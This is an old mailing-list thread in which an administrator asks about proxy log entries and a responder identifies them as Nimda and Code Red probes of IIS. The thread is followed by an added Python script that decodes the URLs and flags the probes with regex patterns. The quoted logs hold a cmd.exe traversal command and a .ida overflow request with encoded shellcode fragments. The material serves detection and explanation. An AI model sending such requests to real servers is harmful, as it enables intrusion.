> 
> Hello,
> I need some help with the following messages that have 
> appeared in my CacheFlow access log file.
> 
> 
> 200.xxx.xxx.xxx TCP_ERR_MISS/301 162 GET 
> http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir - 
> DIRECT/- -
> 200.xxx.xxx.xxx TCP_ERR_MISS/301 162 GET 
> http://www/scripts/root.exe?/c+dir 
> - DIRECT/- -
> 
> What are these messages supposed to mean? They came from dozens 
> of different IP addresses.
> 

This is part of Nimda -> it's trying to do something nasty to a Windows
box...running IIS



> 
> 
> Also there are several .ida request messages like this
> 
> 200.xxx.xxx.xxx TCP_ERR_MISS/503 2874 GET 
> http://200.xxx.xxx.xxx/default.ida?XXXXX... XXXXXXXXXXXX
> XXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u68
> 58%ucbd3%u7801%u9090%u9090%u8190
> %u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - DIRECT/- -


ida/idq exploits...again Nimda trying to do bad things to a
Windows box running IIS



> 
> Now, in this case....the first IP address is the one that is 
> infected with the red code, right?
> And the second one is the host that it is trying to infect? 
> So...if the second one is not a machine
> running IIS, those messages don't really care, right?
> 
> 

Code Red/Nimda -> similar methods of attack.
Yes, in your logs, that is what you're seeing...
the first box is "attacking", the second box is being hit.
The only downside of it is that it's going to use up some
bandwidth.


> Thanks,
> Walter
> 
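
A way to triage such entries, added here as an example and not part of the original thread: the script parses access-log lines in the layout quoted above, percent-decodes each URL until it stops changing, and groups the client addresses by the request shapes discussed in the messages. The sample lines, the label names and the function names are constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Constructed sample in the layout of the quoted log lines; the addresses are
# documentation-range placeholders, and the last line is ordinary traffic.
SAMPLE_LOG = """\
192.0.2.10 TCP_ERR_MISS/301 162 GET http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir - DIRECT/- -
192.0.2.10 TCP_ERR_MISS/301 162 GET http://www/scripts/root.exe?/c+dir - DIRECT/- -
198.51.100.7 TCP_ERR_MISS/503 2874 GET http://203.0.113.5/default.ida?XXXXXXXX%u9090%u6858 - DIRECT/- -
192.0.2.44 TCP_MISS/200 5120 GET http://www.example.com/index.html - DIRECT/203.0.113.80 text/html
"""

# client, action/status, bytes, method, URL (remaining fields are ignored)
LINE_RE = re.compile(r"^(\S+)\s+[A-Z_]+/\d{3}\s+\d+\s+[A-Z]+\s+(\S+)")

# Labels are this example's own names for the request shapes quoted in the thread.
RULES = [
    ("dir-traversal", re.compile(r"\.\.[\\/]")),
    ("iis-cmd-probe", re.compile(r"/(?:cmd|root)\.exe\?", re.I)),
    ("ida-overflow-probe", re.compile(r"/default\.ida\?.*%u[0-9a-f]{4}", re.I)),
]

def fully_decode(url, max_rounds=3):
    """Percent-decode until stable, so ..%%35c.. -> ..%5c.. -> ..\\.. is seen."""
    for _ in range(max_rounds):
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    return url

def classify(line):
    """Return (client_ip, target_host, labels), or None if the line does not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    client, url = m.groups()
    decoded = fully_decode(url)
    labels = [name for name, rx in RULES if rx.search(decoded)]
    return client, urlsplit(url).hostname, labels

def probing_clients(log_text):
    """Map each client that sent a probe to the set of labels it triggered."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        parsed = classify(line)
        if parsed and parsed[2]:
            hits[parsed[0]].update(parsed[2])
    return dict(hits)
```

The keys of the returned mapping are the client addresses, that is, the first field of each log line; the host inside the URL is the one being probed.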